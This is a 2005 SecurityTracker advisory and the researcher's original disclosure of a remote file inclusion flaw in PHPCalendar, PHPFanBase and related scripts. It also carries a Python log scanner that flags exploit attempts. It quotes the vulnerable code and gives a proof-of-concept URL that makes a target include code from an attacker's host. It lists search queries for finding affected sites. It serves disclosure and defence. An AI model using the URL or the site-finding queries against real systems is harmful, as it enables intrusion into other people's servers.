SecurityTracker.com
Category:  Application (Calendar)  >  PHPCalendar
Vendors:  [Multiple Authors/Vendors]
PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, and PHPQuotes Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015206
SecurityTracker URL:  http://securitytracker.com/id?1015206
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Nov 15 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  Robin Verton reported a vulnerability in PHPCalendar and other scripts available via 'codegrrl.com'. A remote user can execute arbitrary code on the target system.

The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/protection.php?action=logout&siteurl=http://[remote]/malicoius-code.txt

The PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, and PHPQuotes scripts available via 'codegrrl.com' are affected.

Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  codegrrl.com/
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Robin Verton" <r.verton@gmail.com>
Message History:   None.
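
A defender's view of the request described above, as an added example (not part of the advisory or of the vendor's code): a Python scan of web-server access logs for requests to 'protection.php' whose 'siteurl' value names a remote or wrapper resource. The log lines, client addresses and the host remote.example are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); all hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Nov/2005:10:00:01 +0100] "GET /protection.php?action=logout HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [15/Nov/2005:10:00:07 +0100] "GET /cal/protection.php?action=logout&siteurl=http://remote.example/x.txt HTTP/1.1" 200 90 "-" "-"',
    '192.0.2.45 - - [15/Nov/2005:10:00:09 +0100] "GET /protection.php?siteurl=hTTp%3A%2F%2Fremote.example%2Fx.txt&action=logout HTTP/1.0" 200 90 "-" "-"',
    '192.0.2.46 - - [15/Nov/2005:10:01:00 +0100] "POST /protection.php?siteurl=%2566tp://remote.example/x HTTP/1.1" 200 90 "-" "-"',
    '192.0.2.11 - - [15/Nov/2005:10:02:00 +0100] "GET /index.php?siteurl=http://remote.example/ HTTP/1.1" 200 300 "-" "-"',
]

# Client address, method and request target from one log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*"')
# A URL/wrapper scheme ("http:", "ftp:", "php:"), a protocol-relative "//" or a UNC prefix.
REMOTE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//|\\\\)', re.I)

def fully_decode(value, rounds=3):
    """Peel repeated percent-encoding so %2566tp is judged like ftp (conservative)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines, script="protection.php", param="siteurl"):
    """Return (client, value) for requests to `script` whose `param` names a remote resource."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parsable request line
        client, _method, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/" + script):
            continue  # only the affected script is of interest
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            value = fully_decode(raw)
            if REMOTE.match(value):
                hits.append((client, value))
    return hits

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(client, value)
```

With register_globals enabled the same variable can also be set from a POST body or a cookie, which a standard access log does not record, so an empty result does not rule out abuse.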


 Source Message Contents

Date:  Sun, 13 Nov 2005 17:34:15 +0100
From:  "Robin Verton" <r.verton@gmail.com>
Subject:  PHPCalendar (and some more codegrrl.com products) arbitrary code execution

 
PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================
 
 
   Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
   Severity: Arbitrary code execution
   Risk: High
   Author: Robin Verton <r.verton@gmail.com>
   Date: Sep. 24 2005
   Vendor: codegrrl.com [contacted]
 
 
   Description:
 
 Written in PHP/MySQL, PHPCalendar is a script designed especially to help webmasters to maintain a calendar, with all upcoming events and birthdays. It was designed to be used at personal sites, but it can also be very useful for fansites, to keep track of tours, premiers, awards shows, tv appearances, interviews, magazines features, and many more! You can see it in use at unfloopy.net.
 [http://www.codegrrl.com/]


   Details:

 1) protection.php (with register_globals = On)

 If register_globals is on an attacker can include an arbitrary php file to execute malicious code.

     $logout_page = "$siteurl";
     [...]
     if ($action == "logout") {
         Setcookie("logincookie[pwd]","",time() -86400);
         Setcookie("logincookie[user]","",time() - 86400);
         @include($logout_page);
         exit;
     }


   Proof of Concept:

 To exploit this vulnerability an attacker only has to use the following HTTP-Request:

 http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-code.txt


   Patch:

 Set register_globals in the php.ini off or disallow direct access to the protection.php f.e. define constants and use code like

     if( !defined('IN_SYS') ) {
         die('Hacking attempt');
     }

 to prevent the direct access


   Credits:

 Credit goes to Robin Verton, 15 years old from Germany


   References:

 [1] http://codegrrl.com
 [2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about 112,000 results]
 [3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 [about 44,000 results]
 [4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 [about 44,000 results]
 [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22
 [6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22



Copyright 2005, SecurityGlobal.net LLC